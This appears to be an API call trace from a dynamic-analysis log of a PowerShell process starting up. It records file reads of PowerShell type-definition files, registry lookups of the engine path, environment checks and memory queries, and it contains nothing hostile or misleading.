	[0140.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.005] SetErrorMode (uMode=0x1) returned 0x1
	[0140.005] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d270 | out: lpFileInformation=0x14d270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0140.005] SetErrorMode (uMode=0x1) returned 0x1
	[0140.006] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0140.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.006] CoTaskMemFree (pv=0x1b7a4040) 
	[0140.008] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0140.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.008] CoTaskMemFree (pv=0x1b7a4040) 
	[0140.009] GetACP () returned 0x4e4
	[0140.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.113] SetErrorMode (uMode=0x1) returned 0x1
	[0140.114] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344
	[0140.115] GetFileType (hFile=0x344) returned 0x1
	[0140.115] SetErrorMode (uMode=0x1) returned 0x1
	[0140.115] GetFileType (hFile=0x344) returned 0x1
	[0140.119] ReadFile (in: hFile=0x344, lpBuffer=0x2ec10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec10e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.123] ReadFile (in: hFile=0x344, lpBuffer=0x2ec10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec10e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.124] ReadFile (in: hFile=0x344, lpBuffer=0x2ec10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec10e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.124] ReadFile (in: hFile=0x344, lpBuffer=0x2ec10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec10e8*, lpNumberOfBytesRead=0x14d1a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0140.125] ReadFile (in: hFile=0x344, lpBuffer=0x2ec0543, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0543*, lpNumberOfBytesRead=0x14d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0140.125] ReadFile (in: hFile=0x344, lpBuffer=0x2ec10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ec10e8*, lpNumberOfBytesRead=0x14d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0140.127] CloseHandle (hObject=0x344) returned 1
	[0140.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.129] SetErrorMode (uMode=0x1) returned 0x1
	[0140.129] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0140.129] SetErrorMode (uMode=0x1) returned 0x1
	[0140.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.131] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x344) returned 0x0
	[0140.131] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0140.131] CoTaskMemAlloc (cb=0x5a) returned 0x1b7adb80
	[0140.131] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1b7adb80, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0140.131] CoTaskMemFree (pv=0x1b7adb80) 
	[0140.131] RegCloseKey (hKey=0x344) returned 0x0
	[0140.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.292] GetSystemInfo (in: lpSystemInfo=0x14be40 | out: lpSystemInfo=0x14be40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0140.292] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0140.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.505] SetErrorMode (uMode=0x1) returned 0x1
	[0140.505] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344
	[0140.505] GetFileType (hFile=0x344) returned 0x1
	[0140.505] SetErrorMode (uMode=0x1) returned 0x1
	[0140.505] GetFileType (hFile=0x344) returned 0x1
	[0140.505] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.506] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.506] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.508] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.509] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.509] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.509] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.510] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.510] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.510] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.510] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.511] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.513] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.513] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.513] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.513] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.514] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.514] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.514] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.515] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.515] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.515] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.515] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.516] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.516] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.516] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.516] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.517] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.520] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.521] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.521] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.521] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.522] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.522] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.522] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.523] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0140.523] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0140.523] ReadFile (in: hFile=0x344, lpBuffer=0x2dc49e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dc49e8*, lpNumberOfBytesRead=0x14d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0140.523] CloseHandle (hObject=0x344) returned 1
	[0140.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.523] SetErrorMode (uMode=0x1) returned 0x1
	[0140.523] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0140.524] SetErrorMode (uMode=0x1) returned 0x1
	[0140.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.524] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x344) returned 0x0
	[0140.524] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0140.524] CoTaskMemAlloc (cb=0x5a) returned 0x1bf780
	[0140.524] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1bf780, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0140.524] CoTaskMemFree (pv=0x1bf780) 
	[0140.524] RegCloseKey (hKey=0x344) returned 0x0
	[0140.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0141.177] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.463] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.465] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.465] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.465] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.466] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.466] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.469] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.481] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.482] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
